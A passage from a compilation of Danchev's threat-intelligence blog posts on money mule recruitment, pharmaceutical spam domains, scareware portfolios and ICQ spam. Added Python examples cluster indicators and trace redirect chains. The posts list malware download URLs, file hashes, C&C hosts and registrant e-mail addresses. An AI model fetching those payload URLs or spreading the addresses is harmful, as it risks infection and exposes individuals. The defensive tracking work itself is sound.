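@dataclass
class Record:
    host: str
    email: str
    ip: Optional[str] = None
    asn: Optional[str] = None


def parse(text: str) -> List[Record]:
    """Parse the post's list layout. Hosts and e-mails are lower-cased so
    that differently-cased copies of one indicator pivot together."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unparseable line: {line!r}")
        records.append(Record(m["host"].lower(), m["email"].lower(), m["ip"], m["asn"]))
    return records


def pivot(records: List[Record], attr: str) -> Dict[str, List[str]]:
    """Group hosts by one attribute; keep only values shared by 2+ hosts."""
    groups = defaultdict(list)
    for r in records:
        value = getattr(r, attr)
        if value:
            groups[value].append(r.host)
    return {k: v for k, v in groups.items() if len(v) > 1}


def mail_providers(records: List[Record]) -> Dict[str, int]:
    """Count registrant addresses per mail provider. A portfolio spread over
    a few throwaway providers, with dictionary-word local parts, is the
    signal the post reads as automated e-mail account registration."""
    counts = defaultdict(int)
    for r in records:
        counts[r.email.split("@", 1)[1]] += 1
    return dict(counts)


def clusters(records: List[Record]) -> List[List[str]]:
    """Connected components over shared registrant e-mail and shared IP
    (union-find). AS numbers are deliberately not used: an AS identifies a
    hosting provider, too coarse a pivot to link two domains on its own."""
    parent = {r.host: r.host for r in records}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for attr in ("email", "ip"):
        for hosts in pivot(records, attr).values():
            for other in hosts[1:]:
                parent[find(other)] = find(hosts[0])

    members = defaultdict(list)
    for r in records:
        members[find(r.host)].append(r.host)
    # largest cluster first; singletons carry no linking information
    return sorted((sorted(m) for m in members.values() if len(m) > 1), key=len, reverse=True)


if __name__ == "__main__":
    recs = parse(SAMPLE)
    print("providers:", mail_providers(recs))
    for attr in ("email", "ip", "asn"):
        print(f"shared {attr}:", pivot(recs, attr))
    print("clusters:", clusters(recs))
```

Feed the complete lists to parse() to get the full picture; the same layout is used by the Yahoo!-registered pharmaceutical portfolio in the next post, so the parser handles that list unchanged. The AS pivot is reported but kept out of the clustering on purpose, since two domains in one AS share a hosting provider, not necessarily an operator.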

- Long term trends - "from mule inventory to transactions inventory"

With the [4]localization and standardization/template-tization of the entire money mule recruitment process now an everyday reality, quality assurance and diversification of the markets/market segments, in order to increase the probability of a successful social engineering attack, will start taking place. Moreover, the current template-driven recruitment ecosystem will inevitably start taking advantage of basic concepts such as geolocation and content cloaking, in order to once again increase the probability of converting a web site visitor into a mule.

At an invite-only conference that I attended in September, 2010, someone from the audience asked me a rather interesting question. Does it really matter how many mules are recruited by a particular syndicate, and most importantly, can we talk about an average number of days/weeks/hours by the time the mule gets busted and can no longer offer his/her services?

In the long term, we're inevitably going to witness the migration from building inventories of mules to a transaction-driven mule recruitment model, where the capability-driven mentality surpasses the mule-inventory-building one.

The number of possible transactions, with success rates based on historical performance, combined with an infinite loop of recruitment, is what will drive the entire mule recruitment ecosystem.

Related posts:

[5] The DNS Infrastructure of the Money Mule Recruitment Ecosystem

[6] Keeping Money Mule Recruiters on a Short Leash - Part Four

[7] Money Mule Recruitment Campaign Serving Client-Side Exploits

[8] Keeping Money Mule Recruiters on a Short Leash - Part Three

[9] Money Mule Recruiters on Yahoo!'s Web Hosting

[10] Dissecting an Ongoing Money Mule Recruitment Campaign

[11] Keeping Money Mule Recruiters on a Short Leash - Part Two

[12] Keeping Reshipping Mule Recruiters on a Short Leash

[13] Keeping Money Mule Recruiters on a Short Leash

[14] Standardizing the Money Mule Recruitment Process

[15] Inside a Money Laundering Group's Spamming Operations

[16] Money Mule Recruiters use ASProx's Fast Fluxing Services

[17] Money Mules Syndicate Actively Recruiting Since 2002

This post has been reproduced from [18]Dancho Danchev's blog.

1. http://ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short.html

2. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

3. http://www.zdnet.com/blog/security/inside-indias-captcha-solving-economy/1835

4. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

5. http://ddanchev.blogspot.com/2010/04/dns-infrastructure-of-money-mule.html

6. http://ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short.html

7. http://ddanchev.blogspot.com/2010/03/money-mule-recruitment-campaign-serving.html

8. http://ddanchev.blogspot.com/2010/03/keeping-money-mule-recruiters-on-short.html

9. http://ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web.html

10. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.html

11. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html

12. http://ddanchev.blogspot.com/2009/12/keeping-reshipping-mule-recruiters-on.html

13. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

14. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

15. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

16. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html

17. http://ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.html

18. http://ddanchev.blogspot.com/
Whatever the cybercrime marketplace demands, the cybercrime marketplace supplies.
Spamvertised Portfolio of Fraudulent/Pharmaceutical Domains (2011-02-14 20:14)

Just in time for Saint Valentine's Day, pharmaceutical scammers have switched their localized templates to a more romantic theme.

The domains have been registered using three separate Yahoo! Mail accounts, and are all responding to a single IP - 115.239.229.196; AS4134, CHINA-TELECOM China Telecom - with four currently active [1]ZeuS C&Cs within the same AS - aiyanxinxi.com; wawnet.net; www.zuihouyi.com; nascetur.com.

abpillsw.ru - Email: nikitapetuhov@yahoo.com
alpillsw.ru - Email: nikitapetuhov@yahoo.com
alypillsw.ru - Email: nikitapetuhov@yahoo.com
annpillsp.ru - Email: muzalevskayaekaterina@yahoo.com
asapillsm.ru - Email: alexeycheremisinov@yahoo.com
barpillsw.ru - Email: nikitapetuhov@yahoo.com
bazpillso.ru - Email: muzalevskayaekaterina@yahoo.com
bupillsp.ru - Email: muzalevskayaekaterina@yahoo.com
capillso.ru - Email: muzalevskayaekaterina@yahoo.com
carpillsw.ru - Email: nikitapetuhov@yahoo.com
celpillsw.ru - Email: nikitapetuhov@yahoo.com
chapillsm.ru - Email: alexeycheremisinov@yahoo
chapillso.ru - Email: muzalevskayaekaterina@yahoo.com
chpillso.ru - Email: muzalevskayaekaterina@yahoo.com
cinpillsp.ru - Email: nikitapetuhov@yahoo.com
conpillsw.ru - Email: alexeycheremisinov@yahoo.com
copillsm.ru - Email: alexeycheremisinov@yahoo.com
copillsp.ru - Email: muzalevskayaekaterina@yahoo.com
corpillsp.ru - Email: muzalevskayaekaterina@yahoo.com
crpillsm.ru - Email: alexeycheremisinov@yahoo.com
depillsm.ru - Email: alexeycheremisinov@yahoo.com
depillso.ru - Email: muzalevskayaekaterina@yahoo.com
despillsw.ru - Email: nikitapetuhov@yahoo.com
dipillsm.ru - Email: alexeycheremisinov@yahoo.com
dipillsw.ru - Email: nikitapetuhov@yahoo.com
duppillsp.ru - Email: muzalevskayaekaterina@yahoo.com
enkpillsp.ru - Email: muzalevskayaekaterina@yahoo.com
estpillsm.ru - Email: alexeycheremisinov@yahoo.com
ethpillsm.ru - Email: alexeycheremisinov@yahoo.com
exapillsw.ru - Email: nikitapetuhov@yahoo.com
fhpillso.ru - Email: alexeycheremisinov@yahoo.com
fipillso.ru - Email: alexeycheremisinov@yahoo.com
funpills.ru - Email: muzalevskayaekaterina@yahoo.com
glpillso.ru - Email: alexeycheremisinov@yahoo.com
haupillso.ru - Email: alexeycheremisinov@yahoo.com
hipills.ru - Email: muzalevskayaekaterina@yahoo.com
invpillso.ru - Email: alexeycheremisinov@yahoo.com
isapillsp.ru - Email: muzalevskayaekaterina@yahoo.com
itepillsw.ru - Email: nikitapetuhov@yahoo.com
jopillso.ru - Email: alexeycheremisinov@yahoo.com
kipillsp.ru - Email: muzalevskayaekaterina@yahoo.com
kipillsw.ru - Email: nikitapetuhov@yahoo.com
krpillsw.ru - Email: nikitapetuhov@yahoo.com
lopillso.ru - Email: alexeycheremisinov@yahoo.com
lopillsw.ru - Email: nikitapetuhov@yahoo.com
mapillso.ru - Email: alexeycheremisinov@yahoo.com
marpillsw.ru - Email: nikitapetuhov@yahoo.com
metpillso.ru - Email: alexeycheremisinov@yahoo.com
monpillsp.ru - Email: muzalevskayaekaterina@yahoo.com
nopillsp.ru - Email: muzalevskayaekaterina@yahoo.com
odpillsw.ru - Email: nikitapetuhov@yahoo.com
panpillsw.ru - Email: nikitapetuhov@yahoo.com
phpillsp.ru - Email: muzalevskayaekaterina@yahoo.com
pillsbi.ru - Email: simakovs@yahoo.com
pillsly.ru - Email: alexeycheremisinov@yahoo.com
pillsnk.ru - Email: alexeycheremisinov@yahoo.com
pillsoep.ru - Email: alexeycheremisinov@yahoo.com
pillsoes.ru - Email: alexeycheremisinov@yahoo.com
pillsoff.ru - Email: alexeycheremisinov@yahoo.com
pillsogn.ru - Email: alexeycheremisinov@yahoo.com
pillsois.ru - Email: alexeycheremisinov@yahoo.com
pillsoke.ru - Email: alexeycheremisinov@yahoo.com
pillsokt.ru - Email: alexeycheremisinov@yahoo.com
pillsong.ru - Email: alexeycheremisinov@yahoo.com
pillsont.ru - Email: alexeycheremisinov@yahoo.com
pillsooc.ru - Email: alexeycheremisinov@yahoo.com
pillsopa.ru - Email: alexeycheremisinov@yahoo.com
pillsore.ru - Email: alexeycheremisinov@yahoo.com
pillsosa.ru - Email: alexeycheremisinov@yahoo.com
pillsosl.ru - Email: alexeycheremisinov@yahoo.com
pillsoti.ru - Email: alexeycheremisinov@yahoo.com
pillsouc.ru - Email: alexeycheremisinov@yahoo.com
pillsove.ru - Email: alexeycheremisinov@yahoo.com
pillspba.ru - Email: muzalevskayaekaterina@yahoo.com
pillsper.ru - Email: muzalevskayaekaterina@yahoo.com
pillspiz.ru - Email: muzalevskayaekaterina@yahoo.com
pillspnc.ru - Email: muzalevskayaekaterina@yahoo.com
pillspne.ru - Email: muzalevskayaekaterina@yahoo.com
pillspno.ru - Email: muzalevskayaekaterina@yahoo.com
pillspns.ru - Email: muzalevskayaekaterina@yahoo.com
pillsppp.ru - Email: muzalevskayaekaterina@yahoo.com
pillsppt.ru - Email: muzalevskayaekaterina@yahoo.com
pillspra.ru - Email: muzalevskayaekaterina@yahoo.com
pillspre.ru - Email: muzalevskayaekaterina@yahoo.com
pillsprg.ru - Email: muzalevskayaekaterina@yahoo.com
pillspsa.ru - Email: muzalevskayaekaterina@yahoo.com
pillspss.ru - Email: muzalevskayaekaterina@yahoo.com
pillspst.ru - Email: muzalevskayaekaterina@yahoo.com
pillspti.ru - Email: muzalevskayaekaterina@yahoo.com
pillsqu.ru - Email: alexeycheremisinov@yahoo.com
pillswal.ru - Email: nikitapetuhov@yahoo.com
pillswam.ru - Email: nikitapetuhov@yahoo.com
pillswar.ru - Email: nikitapetuhov@yahoo.com
pillswau.ru - Email: nikitapetuhov@yahoo.com 
pillswcu.ru - Email: nikitapetuhov@yahoo.com 
pillswed.ru - Email: nikitapetuhov@yahoo.com 
piilswep.ru - Email: nikitapetuhov@yahoo.com 
pillswer.ru - Email: nikitapetuhov@yahoo.com 
piiiswet.ru - Email: nikitapetuhov@yahoo.com 
pillswey.ru - Email: nikitapetuhov@yahoo.com 
piiiswis.ru - Email: nikitapetuhov@yahoo.com 
pillswng.ru - Email: nikitapetuhov@yahoo.com 



pillswol.ru - Email: nikitapetuhov@yahoo.com 
pillswre.ru - Email: nikitapetuhov@yahoo.com
pillswss.ru - Email: nikitapetuhov@yahoo.com
pillswti.ru - Email: nikitapetuhov@yahoo.com
pillswtt.ru - Email: nikitapetuhov@yahoo.com
pillswwa.ru - Email: nikitapetuhov@yahoo.com
pillszva.ru - Email: nikitapetuhov@yahoo.com
pillszzi.ru - Email: nikitapetuhov@yahoo.com
propillsp.ru - Email: muzalevskayaekaterina@yahoo.com
puppillso.ru - Email: alexeycheremisinov@yahoo.com
rempillso.ru - Email: alexeycheremisinov@yahoo.com
repillso.ru - Email: alexeycheremisinov@yahoo.com
sipillsw.ru - Email: nikitapetuhov@yahoo.com
stapillso.ru - Email: alexeycheremisinov@yahoo.com
supillsp.ru - Email: muzalevskayaekaterina@yahoo.com
tilpillso.ru - Email: alexeycheremisinov@yahoo.com
tilpillsw.ru - Email: nikitapetuhov@yahoo.com
towpillsp.ru - Email: muzalevskayaekaterina@yahoo.com
trpillsp.ru - Email: muzalevskayaekaterina@yahoo.com
uncpillso.ru - Email: alexeycheremisinov@yahoo.com
vipillsp.ru - Email: muzalevskayaekaterina@yahoo.com
whapillsw.ru - Email: nikitapetuhov@yahoo.com

See also:

• [2]Inside an affiliate spam program for pharmaceuticals

• [3]Survey: Millions of users open spam emails, click on links

• [4]Microsoft's Bing invaded by pharmaceutical scammers

Name servers of notice, responding to 115.239.229.196 (AS4134); 113.23.142.119 (AS38182) and 78.46.105.205 (AS24940 - active [5]SpyEye C&Cs at www.privathosting.eu; spl.privathosting.eu). The IP each name server resolved to is given where it was recorded:

ns1.advidns.ru - 113.23.142.119
ns1.alemedicp.ru
ns1.annudns.com - 78.46.105.205
ns1.bacdns.ru - 115.239.229.196
ns1.bacmedicp.ru - 115.239.229.196
ns1.bestworlddns.com - 113.23.142.119
ns1.botedns.com - 78.46.105.205
ns1.boxdns.ru - 113.23.142.119
ns1.camdns.ru - 115.239.229.196
ns1.cashdns.ru - 113.23.142.119
ns1.caulsdns.com - 78.46.105.205
ns1.comtdns.com - 113.23.142.119
ns1.crouadns.ru - 113.23.142.119
ns1.culldns.com - 113.23.142.119
ns1.delmedicv.ru - 115.239.229.196
ns1.dns4work.ru - 113.23.142.119
ns1.dnsbest.ru - 115.239.229.196
ns1.dnsbestfind.com - 78.46.105.205
ns1.dnsoper.com - 78.46.105.205
ns1.dnsorbi.com - 115.239.229.196
ns1.dnsroomo.ru - 115.239.229.196
ns1.dnswork.ru - 115.239.229.196
ns1.doctorci.ru - 115.239.229.196
ns1.doctorngee.ru - 115.239.229.196
ns1.doctorrfix.com
ns1.doctorude.ru - 115.239.229.196
ns1.doctorxst.ru
ns1.doctorxve.ru
ns1.drdoctorx.ru
ns1.dromedicp.ru
ns1.eagreadns.ru - 115.239.229.196
ns1.elmendns.ru - 115.239.229.196
ns1.feldns.ru
ns1.glisdns.com - 113.23.142.119
ns1.gurndns.ru - 115.239.229.196
ns1.hardns.ru
ns1.psidns.com - 78.46.105.205
ns1.rxshopsmor.ru
ns1.sighost.ru - 115.239.229.196
ns1.standns.com
ns1.subrdns.ru - 113.23.142.119
ns1.tiodns.com - 113.23.142.119
ns1.twdoctor.com - 115.239.229.196
ns1.vodoctorx.ru - 115.239.229.196
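
The lists above only become intelligence once they are pivoted. What follows is an added example, not the author's tooling: it reads "domain - Email:" and "host - IP" lines in the format used on this page, groups domains by registrant address and name servers by the address they resolve to, and sets aside domains whose only contact is a WHOIS privacy proxy (such as contact@privacyprotect.org, which the scareware portfolio further down this page uses), since a shared proxy address links nothing. The SAMPLE lines are a constructed subset of the entries above.

```python
"""Pivot registrant e-mails and name-server IPs from the lists above.

Added example, not the author's tooling. SAMPLE is a constructed subset of
the page's entries in the page's own "name - Email: x" / "host - IP" shape."""
import re
from collections import defaultdict

# Contact addresses that belong to a privacy service, not to a registrant;
# a cluster built on one of these is meaningless.
PRIVACY_CONTACTS = {"contact@privacyprotect.org"}

LINE_RE = re.compile(
    r"^(?P<name>[a-z0-9.-]+)\s*-\s*"
    r"(?:(?P<ip>\d{1,3}(?:\.\d{1,3}){3})|Email:\s*(?P<email>\S+@\S+))",
    re.IGNORECASE,
)

SAMPLE = """\
copillsp.ru - Email: muzalevskayaekaterina@yahoo.com
crpillsm.ru - Email: alexeycheremisinov@yahoo.com
dipillsw.ru - Email: nikitapetuhov@yahoo.com
kipillsp.ru - Email: muzalevskayaekaterina@yahoo.com
pillsbi.ru - Email: simakovs@yahoo.com
bigvideocams.com - Email: contact@privacyprotect.org
ns1.bacdns.ru - 115.239.229.196
ns1.camdns.ru - 115.239.229.196
ns1.advidns.ru - 113.23.142.119
ns1.annudns.com - 78.46.105.205
"""


def parse_lines(text):
    """Yield (name, ip, email) for each line in one of the two shapes;
    headers, blank lines and anything else are skipped."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            email = m.group("email")
            yield m.group("name").lower(), m.group("ip"), (email.lower() if email else None)


def cluster(text):
    """Return (by_email, by_ip, unpivotable): names grouped by registrant
    address, names grouped by resolved IP, and names whose only contact is
    a privacy proxy."""
    by_email, by_ip, unpivotable = defaultdict(set), defaultdict(set), set()
    for name, ip, email in parse_lines(text):
        if email in PRIVACY_CONTACTS:
            unpivotable.add(name)
        elif email:
            by_email[email].add(name)
        if ip:
            by_ip[ip].add(name)
    return dict(by_email), dict(by_ip), unpivotable


def shared_hosts(by_ip, minimum=2):
    """IPs answering for at least `minimum` names, largest cluster first:
    one address behind many name servers is the consolidation point."""
    hits = [(ip, sorted(names)) for ip, names in by_ip.items() if len(names) >= minimum]
    return sorted(hits, key=lambda t: (-len(t[1]), t[0]))


if __name__ == "__main__":
    emails, ips, proxied = cluster(SAMPLE)
    for addr, names in sorted(emails.items()):
        print(f"{addr}: {len(names)} domains -> {', '.join(sorted(names))}")
    for ip, names in shared_hosts(ips):
        print(f"{ip}: {', '.join(names)}")
    print("privacy-proxied (not pivotable):", ", ".join(sorted(proxied)))
```

Run it over the full lists above and the three registrant mailboxes and the three name-server IPs fall out directly; the same parser applies to the later posts on this page, where 78.46.105.205 recurs.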

This post has been reproduced from [6]Dancho Danchev's blog.

1. https://zeustracker.abuse.ch/monitor.php?as=4134

2. http://www.zdnet.com/blog/security/inside-an-affiliate-spam-program-for-pharmaceuticals/2054

3. http://www.zdnet.com/blog/security/survey-millions-of-users-open-spam-emails-click-on-links/5889

4. http://www.zdnet.com/blog/security/microsofts-bing-invaded-by-pharmaceutical-scammers/3993

5. https://spyeyetracker.abuse.ch/monitor.php?as=24940

6. http://ddanchev.blogspot.com/
A Diverse Portfolio of Fake Security Software - Part Twenty Five (2011-02-15 16:06)

Scareware continues occupying the top spots for malicious monetization tactics courtesy of the cybercrime ecosystem. Disruption of this monetization chain can take place through multiple processes. For instance:

• Share data with the affected ISP whose customers participate in the black hat SEO campaign

• Target the payment processing gateways, or inform the legitimate one

• Target the redirector URLs of the campaign

• Target the affiliate network itself

• Target the "final output" in the form of scareware domains

In this post we'll expose a portfolio of scareware domains, and will target the "final output" of the campaign, in between sharing data with community members. As always, what originally looks like a low profile campaign always turns into a piece of the puzzle from the massive blackhat SEO "picture".

- Detection rate for systemwrecksavertingsystem.com/scan1/92/freesystemscan.exe

[1]freesystemscan.exe - Trojan.Win32.FakeAV

Result: 17/43 (39.5 %)

MD5: a69a7f1992ed4607ac0a163d66984f56
SHA1: ef089f92881ff6835b76562febdcbc3328340adb
SHA256: 993026853e2bbc8846dbda5a90c4f06a9a18b83c9f97fe7b1557b03975ebeaff

- Detection rate for pornhugevideo.com/video3/88/freevideoplugin.exe

[2]freevideoplugin.exe - Rogue:Win32/FakePAV

Result: 4/42 (9.5 %)

MD5: 8a688d6ebb838f66f16720f4066cf6c6
SHA1: 845e43ad946048346b3d9150ae41fd8f7766ac53
SHA256: db6e3e7a72305d8b36861ed90753555d519bdca5a36aa0581ed363ac264cfbce

Responding to 94.23.105.248 (AS16276; one active [3]ZeuS C&C within the AS: monastehodeboltana.es):

accidentspreventingcenter.com - Email: contact@privacyprotect.org
antibreakingsystem.com - Email: contact@privacyprotect.org
antivirusesshield.com - Email: contact@privacyprotect.org
bigvideocams.com - Email: contact@privacyprotect.org
componentsprotector.com - Email: contact@privacyprotect.org
hugebigpornmovie.com - Email: contact@privacyprotect.org
hugebigred.com - Email: contact@privacyprotect.org
hugemoviecams.com - Email: contact@privacyprotect.org
pcactivitydebugger.com - Email: contact@privacyprotect.org
pcautomaticproblemssolver.com - Email: contact@privacyprotect.org
pccustodianutility.com - Email: contact@privacyprotect.org
pcinspectionutility.com - Email: contact@privacyprotect.org
pcprecautionscenter.com - Email: contact@privacyprotect.org
pcprotectionservant.com - Email: contact@privacyprotect.org
pcriskspreventionscenter.com - Email: contact@privacyprotect.org
pcstabilitymaximizer.com - Email: contact@privacyprotect.org
pctroublessolver.com - Email: contact@privacyprotect.org
pcwardingsystem.com - Email: contact@privacyprotect.org
pornhugevideo.com - Email: contact@privacyprotect.org
systemanticrashesutility.com - Email: contact@privacyprotect.org
systemattentionutility.com - Email: contact@privacyprotect.org
systemshieldingutility.com - Email: contact@privacyprotect.org
systemsupervisioncenter.com - Email: contact@privacyprotect.org
systemtasksoptimizer.com - Email: contact@privacyprotect.org
systemwrecksavertingsystem.com - Email: contact@privacyprotect.org
taskstweakingutility.com - Email: contact@privacyprotect.org
tubemovievideo.com - Email: contact@privacyprotect.org
Responding to 76.76.117.101 (AS21793); 78.46.105.205 (AS24940); 207.58.177.96 (AS25847) and 64.64.3.125 (AS25847). The IP and registrant e-mail are given where they were recorded:

212156dnfgdn.co.cc - 76.76.117.101 - Email: audiodius@hotmail.com
32fdsg3gsg.vv.cc - 76.76.117.101
androlhala.cz.cc
bdfnfebne3nf.vv.cc - 76.76.117.101
bfbf3bfb.vv.cc - 76.76.117.101
cebandis.cz.cc
centrihelm.cz.cc
drelagda.vv.cc - 76.76.117.101
f23f21fafae.vv.cc - 64.64.3.125
fdf2fafaf.vv.cc - 76.76.117.101
gdezdeskto.co.cc - 76.76.117.101
gdsg342gsgs.vv.cc - 76.76.117.101
gewheheh4.co.cc - 76.76.117.101 - Email: audiodius@hotmail.com
gfsdg4gs.co.cc - 76.76.117.101 - Email: audiodius@hotmail.com
graninis.cz.cc
gsdg24gshgr.vv.cc - 76.76.117.101
gsdg43hsweh.co.cc - 76.76.117.101 - Email: audiodius@hotmail.com
gsegf3gstg3g.vv.cc - 76.76.117.101
gsg3gsdgseg.co.cc - 76.76.117.101 - Email: audiodius@hotmail.com
gsgsv2vds.vv.cc - 76.76.117.101
gsgwegweg23g.vv.cc - 76.76.117.101
hdfg43hshf.co.cc - 76.76.117.101 - Email: audiodius@hotmail.com
hdfh34hdrfhf.co.cc - 76.76.117.101 - Email: audiodius@hotmail.com
hdhfdhdfhdfhdfh.vv.cc - 76.76.117.101
hfehe3hdfhf.co.cc - Email: audiodius@hotmail.com
hh3hfdnfdh.co.cc - 76.76.117.101 - Email: audiodius@hotmail.com
hndfdfnfdnxdnf.vv.cc - 76.76.117.101
ht4hdfgjcjgt.vv.cc - 76.76.117.101
hu587tiugi.vv.cc - 76.76.117.101
malakelv.cz.cc - 76.76.117.101
maridora.vv.cc - 76.76.117.101
morlunaya.vv.cc - 64.64.3.125
nvmtymvm.vv.cc - 76.76.117.101
oghmalak.vv.cc - 64.64.3.125
oijqujnnnsul.co.cc - 76.76.117.101 - Email: audiodius@hotmail.com
shalillador.cz.cc - 76.76.117.101
vsegwgewg.vv.cc - 76.76.117.101
wefge3gltglg.vv.cc - 76.76.117.101
yeryeshsdhdhjfdhj.vv.cc - 76.76.117.101
Bogus Adult Content SPIM-ed Over ICQ (2011-02-16 13:25)

A currently SPIM-ed campaign over ICQ attempts to trick the end user into becoming a member of a bogus adult content offering network, which drives sales through spamming.

The links chain:

- ow.ly/3V9eu

- art-spectrum.info/load2/7674/foto.jar - 178.170.250.12 (AS52000, ALDAN-3-AS LTD 'ALDAN-3')

- video-girl.tv/default.aspx - 81.177.3.250 - Email: support@video-people.com (AS8342, RTCOMM-AS OJSC RT-Comm.RU) with two active [1]SpyEye C&Cs within the AS: googlemaps4.com (81.176.236.177) and reg.kygalu.ru - 81.177.32.45 - Email: kygalu.ru@r01-service.ru

- Responding to 178.170.250.12 are also geoinvest.org (178.170.250.12) - Email: geoinvest@sum.co.ru and power-man.ru (178.170.250.12) - Email: antonvp@yandex.ru

- Responding to 81.177.3.250 are:

vchat.kladoffka.com - Email: sanny_dbroker@mail.ru
virtualniyseks.in - Email: sereg@hot.ee
odetih.net - Email: reg@legato.name
pornoton.net
russiansgirls.net
videodevki.ru - Email: prezidentbush@yandex.ru
video-girl.ru - Email: admin@video-girl.ru
strip-girl.ru - Email: kinoman-cd@yandex.ru
webcam-girls.ru - Email: srg_surgut@pisem.net
videoshowgirls.ru - Email: gbgcnbr@i.ua
sexy-chat.ru - Email: roman.alexsandr@mail.ru
flirtshow.ru - Email: rusproject99@yandex.ru
chatsexy.ru - Email: roman.alexsandr@mail.ru
rusprivate.su - Email: sadko-as@rambler.ru
video-girl.tv - Email: support@video-people.com
x-chat.tv - Email: x-chat@mail.ru
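
Expanding a chain like ow.ly -> foto.jar -> video-girl.tv by hand is tedious, and letting an HTTP library auto-follow hides exactly the intermediate hosts that matter. The following is an added example, not the author's tooling: walk_chain() resolves each Location itself, records every hop, stops on loops or at a hop limit, and flags a chain that ends in a file drop. http_fetch() is a live fetcher for real use; RESPONSES is a constructed stand-in modelled on the chain above, and redir.example is a made-up loop.

```python
"""Expand a shortened-link chain one hop at a time, never auto-following.

Added example, not the author's tooling. RESPONSES is constructed, not
captured traffic; http_fetch() is the live equivalent."""
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

REDIRECTS = {301, 302, 303, 307, 308}
# Extensions that mean the "link" is really a file drop.
PAYLOAD_EXT = (".jar", ".exe", ".scr", ".pif", ".apk")


def walk_chain(start, fetch, max_hops=10):
    """fetch(url) -> (status, headers). Returns (hops, verdict) with verdict
    one of 'landed', 'payload', 'loop', 'too_many_hops'."""
    hops, seen, url = [start], {start}, start
    for _ in range(max_hops):
        status, headers = fetch(url)
        lower = {k.lower(): v for k, v in headers.items()}
        if status in REDIRECTS and lower.get("location"):
            nxt = urljoin(url, lower["location"])   # Location may be relative
            if nxt in seen:
                return hops, "loop"
            hops.append(nxt)
            seen.add(nxt)
            url = nxt
            continue
        if urlsplit(url).path.lower().endswith(PAYLOAD_EXT):
            return hops, "payload"
        return hops, "landed"
    return hops, "too_many_hops"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Turn every 3xx into an HTTPError so the hop is seen, not followed."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url, timeout=10):
    """Live fetcher (needs network). HEAD keeps the payload off disk; some
    redirectors answer HEAD differently from GET, so re-check with GET when
    a chain ends earlier than expected."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD", headers={"User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers)
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers)


# Constructed responses modelled on the chain in the post; redir.example is invented.
RESPONSES = {
    "http://ow.ly/3V9eu": (301, {"Location": "http://art-spectrum.info/load2/7674/foto.jar"}),
    "http://art-spectrum.info/load2/7674/foto.jar": (200, {"Content-Type": "application/java-archive"}),
    "http://redir.example/a": (302, {"Location": "/b"}),
    "http://redir.example/b": (302, {"Location": "http://redir.example/a"}),
}


def fake_fetch(url):
    return RESPONSES.get(url, (404, {}))


if __name__ == "__main__":
    for start in ("http://ow.ly/3V9eu", "http://redir.example/a"):
        hops, verdict = walk_chain(start, fake_fetch)
        print(f"{verdict}: " + " -> ".join(hops))
```

Swap fake_fetch for http_fetch to run it against a live shortener; keep the hop limit, since redirector networks of this kind routinely chain a dozen hosts.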

This post has been reproduced from [2]Dancho Danchev's blog.

1. https://spyeyetracker.abuse.ch/monitor.php?as=8342

2. http://ddanchev.blogspot.com/
Sampling 419 Advance Fee Scams Activity - Part Two (2011-02-21 13:54)

(Image: a notice listing "419 MAILS", "SPAM E-MAILS" and "e-mail extractors" as NOT ALLOWED.)

Part two of the [1]Sampling 419 Advance Fee Scams Activity series once again aims to provide actionable real-time threat intelligence on a fraudulent segment that continues tricking hundreds of thousands of average Internet users into thinking that they have pending payments, have won the lottery, or that someone is basically interested in doing multi-million dollar business with them.

The format of the data obtained over the past 24 hours is return email plus the original IP of the sender, most of which can be geolocated to African countries.
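
The two fields in the list below, return address and sender IP, come from the message headers. This added example (not the author's tooling) pulls them out of a raw message: Reply-To is preferred over From, since that is where the mailbox which actually receives the victim's reply is placed, and the originating IP is the first public address in the bottom-most Received header. Only the Received line written by your own mail server can be trusted; everything below it can be forged, so treat the result as a lead rather than proof. SAMPLE is a constructed message; its address and IP reuse one pair from the list.

```python
"""Recover the return mailbox and originating IP of a 419 message.

Added example, not the author's tooling. SAMPLE is constructed; the
documentation-range address 203.0.113.5 stands in for the receiving MX."""
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

IP_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")

SAMPLE = """\
Received: from mx.example.net (mx.example.net [203.0.113.5]) by inbox.example.net; Mon, 21 Feb 2011 10:00:00 +0000
Received: from [10.0.0.7] (unknown [41.218.232.158]) by mx.example.net; Mon, 21 Feb 2011 09:59:58 +0000
From: "Peter Johnson" <noreply@lottery-office.example>
Reply-To: peterjohnson299@yahoo.co.jp
To: victim@example.org
Subject: Your pending payment

You have been selected ...
"""


def _is_public(ip):
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:            # e.g. 999.1.1.1, which the loose regex accepts
        return False


def originating_ip(msg):
    """Each relay prepends its own Received header, so the last one in the
    list is the earliest hop. Private and reserved addresses (the sender's
    own LAN, NAT) are skipped."""
    for hdr in reversed(msg.get_all("Received", [])):
        for ip in IP_RE.findall(hdr):
            if _is_public(ip):
                return ip
    return None


def return_address(msg):
    """(mailbox a victim's reply would reach, True if it differs from From)."""
    reply_to = parseaddr(msg.get("Reply-To", ""))[1].lower()
    sender = parseaddr(msg.get("From", ""))[1].lower()
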